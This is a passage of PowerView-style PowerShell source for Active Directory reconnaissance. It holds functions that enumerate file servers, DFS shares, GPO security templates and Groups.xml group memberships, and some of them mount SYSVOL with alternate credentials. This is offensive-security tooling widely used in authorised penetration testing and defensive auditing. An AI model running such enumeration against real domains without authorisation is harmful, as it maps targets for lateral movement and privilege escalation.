Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainFileServer
Returns active file servers for the current domain.
.EXAMPLE
Get-DomainFileServer -Domain testing.local
Returns active file servers for the 'testing.local' domain.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainFileServer -Credential $Cred
.OUTPUTS
String
One or more strings representing file server names.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType([String])]
[CmdletBinding()]
Param(
[Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[ValidateNotNullOrEmpty()]
[Alias('DomainName', 'Name')]
[String[]]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
function Split-Path {
# short internal helper to split UNC server paths
Param([String]$Path)
if ($Path -and ($Path.split('\\').Count -ge 3)) {
$Temp = $Path.split('\\')[2]
if ($Temp -and ($Temp -ne '')) {
$Temp
}
}
}
$SearcherArguments = @{
'LDAPFilter' = '(&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(homedirectory=*)(scriptpath=*)(profilepath=*)))'
'Properties' = 'homedirectory,scriptpath,profilepath'
}
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
}
PROCESS {
if ($PSBoundParameters['Domain']) {
ForEach ($TargetDomain in $Domain) {
$SearcherArguments['Domain'] = $TargetDomain
$UserSearcher = Get-DomainSearcher @SearcherArguments
# get all results w/o the pipeline and uniquify them (I know it's not pretty)
$(ForEach($UserResult in $UserSearcher.FindAll()) {if ($UserResult.Properties['homedirectory']) {Split-Path($UserResult.Properties['homedirectory'])}if ($UserResult.Properties['scriptpath']) {Split-Path($UserResult.Properties['scriptpath'])}if ($UserResult.Properties['profilepath']) {Split-Path($UserResult.Properties['profilepath'])}}) | Sort-Object -Unique
}
}
else {
$UserSearcher = Get-DomainSearcher @SearcherArguments
$(ForEach($UserResult in $UserSearcher.FindAll()) {if ($UserResult.Properties['homedirectory']) {Split-Path($UserResult.Properties['homedirectory'])}if ($UserResult.Properties['scriptpath']) {Split-Path($UserResult.Properties['scriptpath'])}if ($UserResult.Properties['profilepath']) {Split-Path($UserResult.Properties['profilepath'])}}) | Sort-Object -Unique
}
}
}
function Get-DomainDFSShare {
<#
.SYNOPSIS
Returns a list of all fault-tolerant distributed file systems
for the current (or specified) domains.
Author: Ben Campbell (@meatballs__)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher
.DESCRIPTION
This function searches for all distributed file systems (either version
1, 2, or both depending on -Version X) by searching for domain objects
matching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively
The server data is parsed appropriately and returned.
.PARAMETER Domain
Specifies the domains to use for the query, defaults to the current domain.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainDFSShare
Returns all distributed file system shares for the current domain.
.EXAMPLE
Get-DomainDFSShare -Domain testlab.local
Returns all distributed file system shares for the 'testlab.local' domain.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainDFSShare -Credential $Cred
.OUTPUTS
System.Management.Automation.PSCustomObject
A custom PSObject describing the distributed file systems.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')]
[OutputType('System.Management.Automation.PSCustomObject')]
[CmdletBinding()]
Param(
[Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[ValidateNotNullOrEmpty()]
[Alias('DomainName', 'Name')]
[String[]]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[ValidateSet('All', 'V1', '1', 'V2', '2')]
[String]
$Version = 'All'
)
BEGIN {
$SearcherArguments = @{}
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
function Parse-Pkt {
[CmdletBinding()]
Param(
[Byte[]]
$Pkt
)
$bin = $Pkt
$blob_version = [bitconverter]::ToUInt32($bin[0..3],0)
$blob_element_count = [bitconverter]::ToUInt32($bin[4..7],0)
$offset = 8
#https://msdn.microsoft.com/en-us/library/cc227147.aspx
$object_list = @()
for($i=1; $i -le $blob_element_count; $i++){
$blob_name_size_start = $offset
$blob_name_size_end = $offset + 1
$blob_name_size = [bitconverter]::ToUInt16($bin[$blob_name_size_start..$blob_name_size_end],0)
$blob_name_start = $blob_name_size_end + 1
$blob_name_end = $blob_name_start + $blob_name_size - 1
$blob_name = [System.Text.Encoding]::Unicode.GetString($bin[$blob_name_start..$blob_name_end])
$blob_data_size_start = $blob_name_end + 1
$blob_data_size_end = $blob_data_size_start + 3
$blob_data_size = [bitconverter]::ToUInt32($bin[$blob_data_size_start..$blob_data_size_end],0)
$blob_data_start = $blob_data_size_end + 1
$blob_data_end = $blob_data_start + $blob_data_size - 1
$blob_data = $bin[$blob_data_start..$blob_data_end]
switch -wildcard ($blob_name) {
"\siteroot" { }
"\domainroot*" {
# Parse DFSNamespaceRootOrLinkBlob object. Starts with variable length DFSRootOrLinkIDBlob which we parse first...
# DFSRootOrLinkIDBlob
$root_or_link_guid_start = 0
$root_or_link_guid_end = 15
$root_or_link_guid = [byte[]]$blob_data[$root_or_link_guid_start..$root_or_link_guid_end]
$guid = New-Object Guid(,$root_or_link_guid) # should match $guid_str
$prefix_size_start = $root_or_link_guid_end + 1
$prefix_size_end = $prefix_size_start + 1
$prefix_size = [bitconverter]::ToUInt16($blob_data[$prefix_size_start..$prefix_size_end],0)
$prefix_start = $prefix_size_end + 1
$prefix_end = $prefix_start + $prefix_size - 1
$prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$prefix_start..$prefix_end])
$short_prefix_size_start = $prefix_end + 1
$short_prefix_size_end = $short_prefix_size_start + 1
$short_prefix_size = [bitconverter]::ToUInt16($blob_data[$short_prefix_size_start..$short_prefix_size_end],0)
$short_prefix_start = $short_prefix_size_end + 1
$short_prefix_end = $short_prefix_start + $short_prefix_size - 1
$short_prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$short_prefix_start..$short_prefix_end])
$type_start = $short_prefix_end + 1
$type_end = $type_start + 3
$type = [bitconverter]::ToUInt32($blob_data[$type_start..$type_end],0)
$state_start = $type_end + 1
$state_end = $state_start + 3
$state = [bitconverter]::ToUInt32($blob_data[$state_start..$state_end],0)
$comment_size_start = $state_end + 1
$comment_size_end = $comment_size_start + 1
$comment_size = [bitconverter]::ToUInt16($blob_data[$comment_size_start..$comment_size_end],0)
$comment_start = $comment_size_end + 1
$comment_end = $comment_start + $comment_size - 1
if ($comment_size -gt 0) {
$comment = [System.Text.Encoding]::Unicode.GetString($blob_data[$comment_start..$comment_end])
}
$prefix_timestamp_start = $comment_end + 1
$prefix_timestamp_end = $prefix_timestamp_start + 7
# https://msdn.microsoft.com/en-us/library/cc230324.aspx FILETIME
$prefix_timestamp = $blob_data[$prefix_timestamp_start..$prefix_timestamp_end] #dword lowDateTime #dword highdatetime
$state_timestamp_start = $prefix_timestamp_end + 1
$state_timestamp_end = $state_timestamp_start + 7
$state_timestamp = $blob_data[$state_timestamp_start..$state_timestamp_end]
$comment_timestamp_start = $state_timestamp_end + 1
$comment_timestamp_end = $comment_timestamp_start + 7
$comment_timestamp = $blob_data[$comment_timestamp_start..$comment_timestamp_end]
$version_start = $comment_timestamp_end + 1
$version_end = $version_start + 3
$version = [bitconverter]::ToUInt32($blob_data[$version_start..$version_end],0)
# Parse rest of DFSNamespaceRootOrLinkBlob here
$dfs_targetlist_blob_size_start = $version_end + 1
$dfs_targetlist_blob_size_end = $dfs_targetlist_blob_size_start + 3
$dfs_targetlist_blob_size = [bitconverter]::ToUInt32($blob_data[$dfs_targetlist_blob_size_start..$dfs_targetlist_blob_size_end],0)
$dfs_targetlist_blob_start = $dfs_targetlist_blob_size_end + 1
$dfs_targetlist_blob_end = $dfs_targetlist_blob_start + $dfs_targetlist_blob_size - 1
$dfs_targetlist_blob = $blob_data[$dfs_targetlist_blob_start..$dfs_targetlist_blob_end]
$reserved_blob_size_start = $dfs_targetlist_blob_end + 1
$reserved_blob_size_end = $reserved_blob_size_start + 3
$reserved_blob_size = [bitconverter]::ToUInt32($blob_data[$reserved_blob_size_start..$reserved_blob_size_end],0)
$reserved_blob_start = $reserved_blob_size_end + 1
$reserved_blob_end = $reserved_blob_start + $reserved_blob_size - 1
$reserved_blob = $blob_data[$reserved_blob_start..$reserved_blob_end]
$referral_ttl_start = $reserved_blob_end + 1
$referral_ttl_end = $referral_ttl_start + 3
$referral_ttl = [bitconverter]::ToUInt32($blob_data[$referral_ttl_start..$referral_ttl_end],0)
#Parse DFSTargetListBlob
$target_count_start = 0
$target_count_end = $target_count_start + 3
$target_count = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_count_start..$target_count_end],0)
$t_offset = $target_count_end + 1
for($j=1; $j -le $target_count; $j++){
$target_entry_size_start = $t_offset
$target_entry_size_end = $target_entry_size_start + 3
$target_entry_size = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_entry_size_start..$target_entry_size_end],0)
$target_time_stamp_start = $target_entry_size_end + 1
$target_time_stamp_end = $target_time_stamp_start + 7
# FILETIME again or special if priority rank and priority class 0
$target_time_stamp = $dfs_targetlist_blob[$target_time_stamp_start..$target_time_stamp_end]
$target_state_start = $target_time_stamp_end + 1
$target_state_end = $target_state_start + 3
$target_state = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_state_start..$target_state_end],0)
$target_type_start = $target_state_end + 1
$target_type_end = $target_type_start + 3
$target_type = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_type_start..$target_type_end],0)
$server_name_size_start = $target_type_end + 1
$server_name_size_end = $server_name_size_start + 1
$server_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$server_name_size_start..$server_name_size_end],0)
$server_name_start = $server_name_size_end + 1
$server_name_end = $server_name_start + $server_name_size - 1
$server_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$server_name_start..$server_name_end])
$share_name_size_start = $server_name_end + 1
$share_name_size_end = $share_name_size_start + 1
$share_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$share_name_size_start..$share_name_size_end],0)
$share_name_start = $share_name_size_end + 1
$share_name_end = $share_name_start + $share_name_size - 1
$share_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$share_name_start..$share_name_end])
$target_list += "\\$server_name\$share_name"
$t_offset = $share_name_end + 1
}
}
}
$offset = $blob_data_end + 1
$dfs_pkt_properties = @{
'Name' = $blob_name
'Prefix' = $prefix
'TargetList' = $target_list
}
$object_list += New-Object -TypeName PSObject -Property $dfs_pkt_properties
$prefix = $Null
$blob_name = $Null
$target_list = $Null
}
$servers = @()
$object_list | ForEach-Object {
if ($_.TargetList) {
$_.TargetList | ForEach-Object {
$servers += $_.split('\')[2]
}
}
}
$servers
}
function Get-DomainDFSShareV1 {
[CmdletBinding()]
Param(
[String]
$Domain,
[String]
$SearchBase,
[String]
$Server,
[String]
$SearchScope = 'Subtree',
[Int]
$ResultPageSize = 200,
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
$DFSsearcher = Get-DomainSearcher @PSBoundParameters
if ($DFSsearcher) {
$DFSshares = @()
$DFSsearcher.filter = '(&(objectClass=fTDfs))'
try {
$Results = $DFSSearcher.FindAll()
$Results | Where-Object {$_} | ForEach-Object {
$Properties = $_.Properties
$RemoteNames = $Properties.remoteservername
$Pkt = $Properties.pkt
$DFSshares += $RemoteNames | ForEach-Object {
try {
if ( $_.Contains('\') ) {
New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_.split('\')[2]}
}
}
catch {
Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV1 error in parsing DFS share : $_"
}
}
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV1 error disposing of the Results object: $_"
}
}
$DFSSearcher.dispose()
if ($pkt -and $pkt[0]) {
Parse-Pkt $pkt[0] | ForEach-Object {
# If a folder doesn't have a redirection it will have a target like
# \\null\TestNameSpace\folder\.DFSFolderLink so we do actually want to match
# on 'null' rather than $Null
if ($_ -ne 'null') {
New-Object -TypeName PSObject -Property @{'Name'=$Properties.name[0];'RemoteServerName'=$_}
}
}
}
}
catch {
Write-Warning "[Get-DomainDFSShare] Get-DomainDFSShareV1 error : $_"
}
$DFSshares | Sort-Object -Unique -Property 'RemoteServerName'
}
}
function Get-DomainDFSShareV2 {
[CmdletBinding()]
Param(
[String]
$Domain,
[String]
$SearchBase,
[String]
$Server,
[String]
$SearchScope = 'Subtree',
[Int]
$ResultPageSize = 200,
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
$DFSsearcher = Get-DomainSearcher @PSBoundParameters
if ($DFSsearcher) {
$DFSshares = @()
$DFSsearcher.filter = '(&(objectClass=msDFS-Linkv2))'
$Null = $DFSSearcher.PropertiesToLoad.AddRange(('msdfs-linkpathv2','msDFS-TargetListv2'))
try {
$Results = $DFSSearcher.FindAll()
$Results | Where-Object {$_} | ForEach-Object {
$Properties = $_.Properties
$target_list = $Properties.'msdfs-targetlistv2'[0]
$xml = [xml][System.Text.Encoding]::Unicode.GetString($target_list[2..($target_list.Length-1)])
$DFSshares += $xml.targets.ChildNodes | ForEach-Object {
try {
$Target = $_.InnerText
if ( $Target.Contains('\') ) {
$DFSroot = $Target.split('\')[3]
$ShareName = $Properties.'msdfs-linkpathv2'[0]
New-Object -TypeName PSObject -Property @{'Name'="$DFSroot$ShareName";'RemoteServerName'=$Target.split('\')[2]}
}
}
catch {
Write-Verbose "[Get-DomainDFSShare] Get-DomainDFSShareV2 error in parsing target : $_"
}
}
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainDFSShare] Error disposing of the Results object: $_"
}
}
$DFSSearcher.dispose()
}
catch {
Write-Warning "[Get-DomainDFSShare] Get-DomainDFSShareV2 error : $_"
}
$DFSshares | Sort-Object -Unique -Property 'RemoteServerName'
}
}
}
PROCESS {
$DFSshares = @()
if ($PSBoundParameters['Domain']) {
ForEach ($TargetDomain in $Domain) {
$SearcherArguments['Domain'] = $TargetDomain
if ($Version -match 'all|1') {
$DFSshares += Get-DomainDFSShareV1 @SearcherArguments
}
if ($Version -match 'all|2') {
$DFSshares += Get-DomainDFSShareV2 @SearcherArguments
}
}
}
else {
if ($Version -match 'all|1') {
$DFSshares += Get-DomainDFSShareV1 @SearcherArguments
}
if ($Version -match 'all|2') {
$DFSshares += Get-DomainDFSShareV2 @SearcherArguments
}
}
$DFSshares | Sort-Object -Property ('RemoteServerName','Name') -Unique
}
}
########################################################
#
# GPO related functions.
#
########################################################
function Get-GptTmpl {
<#
.SYNOPSIS
Helper to parse a GptTmpl.inf policy file path into a hashtable.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, Get-IniContent
.DESCRIPTION
Parses a GptTmpl.inf into a custom hashtable using Get-IniContent. If a
GPO object is passed, GPOPATH\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
is constructed and assumed to be the parse target. If -Credential is passed,
Add-RemoteConnection is used to mount \\TARGET\SYSVOL with the specified creds,
the files are parsed, and the connection is destroyed later with Remove-RemoteConnection.
.PARAMETER GptTmplPath
Specifies the GptTmpl.inf file path name to parse.
.PARAMETER OutputObject
Switch. Output a custom PSObject instead of a hashtable.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote system.
.EXAMPLE
Get-GptTmpl -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Parse the default domain policy .inf for dev.testlab.local
.EXAMPLE
Get-DomainGPO testing | Get-GptTmpl
Parse the GptTmpl.inf policy for the GPO with display name of 'testing'.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-GptTmpl -Credential $Cred -GptTmplPath "\\dev.testlab.local\sysvol\dev.testlab.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf"
Parse the default domain policy .inf for dev.testlab.local using alternate credentials.
.OUTPUTS
Hashtable
Ouputs a hashtable representing the parsed GptTmpl.inf file.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType([Hashtable])]
[CmdletBinding()]
Param (
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('gpcfilesyspath', 'Path')]
[String]
$GptTmplPath,
[Switch]
$OutputObject,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$MappedPaths = @{}
}
PROCESS {
try {
if (($GptTmplPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
$SysVolPath = "\\$((New-Object System.Uri($GptTmplPath)).Host)\SYSVOL"
if (-not $MappedPaths[$SysVolPath]) {
# map IPC$ to this computer if it's not already
Add-RemoteConnection -Path $SysVolPath -Credential $Credential
$MappedPaths[$SysVolPath] = $True
}
}
$TargetGptTmplPath = $GptTmplPath
if (-not $TargetGptTmplPath.EndsWith('.inf')) {
$TargetGptTmplPath += '\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf'
}
Write-Verbose "[Get-GptTmpl] Parsing GptTmplPath: $TargetGptTmplPath"
if ($PSBoundParameters['OutputObject']) {
$Contents = Get-IniContent -Path $TargetGptTmplPath -OutputObject -ErrorAction Stop
if ($Contents) {
$Contents | Add-Member Noteproperty 'Path' $TargetGptTmplPath
$Contents
}
}
else {
$Contents = Get-IniContent -Path $TargetGptTmplPath -ErrorAction Stop
if ($Contents) {
$Contents['Path'] = $TargetGptTmplPath
$Contents
}
}
}
catch {
Write-Verbose "[Get-GptTmpl] Error parsing $TargetGptTmplPath : $_"
}
}
END {
# remove the SYSVOL mappings
$MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ }
}
}
function Get-GroupsXML {
<#
.SYNOPSIS
Helper to parse a groups.xml file path into a custom object.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertTo-SID
.DESCRIPTION
Parses a groups.xml into a custom object. If -Credential is passed,
Add-RemoteConnection is used to mount \\TARGET\SYSVOL with the specified creds,
the files are parsed, and the connection is destroyed later with Remove-RemoteConnection.
.PARAMETER GroupsXMLpath
Specifies the groups.xml file path name to parse.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the remote system.
.OUTPUTS
PowerView.GroupsXML
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.GroupsXML')]
[CmdletBinding()]
Param (
[Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('Path')]
[String]
$GroupsXMLPath,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$MappedPaths = @{}
}
PROCESS {
try {
if (($GroupsXMLPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) {
$SysVolPath = "\\$((New-Object System.Uri($GroupsXMLPath)).Host)\SYSVOL"
if (-not $MappedPaths[$SysVolPath]) {
# map IPC$ to this computer if it's not already
Add-RemoteConnection -Path $SysVolPath -Credential $Credential
$MappedPaths[$SysVolPath] = $True
}
}
[XML]$GroupsXMLcontent = Get-Content -Path $GroupsXMLPath -ErrorAction Stop
# process all group properties in the XML
$GroupsXMLcontent | Select-Xml "/Groups/Group" | Select-Object -ExpandProperty node | ForEach-Object {
$Groupname = $_.Properties.groupName
# extract the localgroup sid for memberof
$GroupSID = $_.Properties.groupSid
if (-not $GroupSID) {
if ($Groupname -match 'Administrators') {
$GroupSID = 'S-1-5-32-544'
}
elseif ($Groupname -match 'Remote Desktop') {
$GroupSID = 'S-1-5-32-555'
}
elseif ($Groupname -match 'Guests') {
$GroupSID = 'S-1-5-32-546'
}
else {
if ($PSBoundParameters['Credential']) {
$GroupSID = ConvertTo-SID -ObjectName $Groupname -Credential $Credential
}
else {
$GroupSID = ConvertTo-SID -ObjectName $Groupname
}
}
}
# extract out members added to this group
$Members = $_.Properties.members | Select-Object -ExpandProperty Member | Where-Object { $_.action -match 'ADD' } | ForEach-Object {
if ($_.sid) { $_.sid }
else { $_.name }
}
if ($Members) {
# extract out any/all filters...I hate you GPP
if ($_.filters) {
$Filters = $_.filters.GetEnumerator() | ForEach-Object {
New-Object -TypeName PSObject -Property @{'Type' = $_.LocalName;'Value' = $_.name}
}
}
else {
$Filters = $Null
}
if ($Members -isnot [System.Array]) { $Members = @($Members) }
$GroupsXML = New-Object PSObject
$GroupsXML | Add-Member Noteproperty 'GPOPath' $TargetGroupsXMLPath
$GroupsXML | Add-Member Noteproperty 'Filters' $Filters
$GroupsXML | Add-Member Noteproperty 'GroupName' $GroupName
$GroupsXML | Add-Member Noteproperty 'GroupSID' $GroupSID
$GroupsXML | Add-Member Noteproperty 'GroupMemberOf' $Null
$GroupsXML | Add-Member Noteproperty 'GroupMembers' $Members
$GroupsXML.PSObject.TypeNames.Insert(0, 'PowerView.GroupsXML')
$GroupsXML
}
}
}
catch {
Write-Verbose "[Get-GroupsXML] Error parsing $TargetGroupsXMLPath : $_"
}
}
END {
# remove the SYSVOL mappings
$MappedPaths.Keys | ForEach-Object { Remove-RemoteConnection -Path $_ }
}
}
function Get-DomainGPO {
<#
.SYNOPSIS
Return all GPOs or specific GPO objects in AD.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty
.DESCRIPTION
Builds a directory searcher object using Get-DomainSearcher, builds a custom
LDAP filter based on targeting/filter parameters, and searches for all objects
matching the criteria. To only return specific properties, use
"-Properties samaccountname,usnchanged,...". By default, all GPO objects for
the current domain are returned. To enumerate all GPOs that are applied to
a particular machine, use -ComputerName X.
.PARAMETER Identity
A display name (e.g. 'Test GPO'), DistinguishedName (e.g. 'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
GUID (e.g. '10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g. '{F260B76D-55C8-46C5-BEF1-9016DD98E272}'). Wildcards accepted.
.PARAMETER ComputerIdentity
Return all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.).
.PARAMETER UserIdentity
Return all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.).
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER SecurityMasks
Specifies an option for examining security information of a directory object.
One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER FindOne
Only return one result object.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.PARAMETER Raw
Switch. Return raw results instead of translating the fields into a custom PSObject.
.EXAMPLE
Get-DomainGPO -Domain testlab.local
Return all GPOs for the testlab.local domain
.EXAMPLE
Get-DomainGPO -ComputerName windows1.testlab.local
Returns all GPOs applied windows1.testlab.local
.EXAMPLE
"{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO
Return the GPOs with the name of "{F260B76D-55C8-46C5-BEF1-9016DD98E272}" and the display
name of "Test GPO"
.EXAMPLE
Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainGPO -Credential $Cred
.OUTPUTS
PowerView.GPO
Custom PSObject with translated GPO property fields.
PowerView.GPO.Raw
The raw DirectoryServices.SearchResult object, if -Raw is enabled.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[OutputType('PowerView.GPO')]
[OutputType('PowerView.GPO.Raw')]
[CmdletBinding(DefaultParameterSetName = 'None')]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name')]
[String[]]
$Identity,
[Parameter(ParameterSetName = 'ComputerIdentity')]
[Alias('ComputerName')]
[ValidateNotNullOrEmpty()]
[String]
$ComputerIdentity,
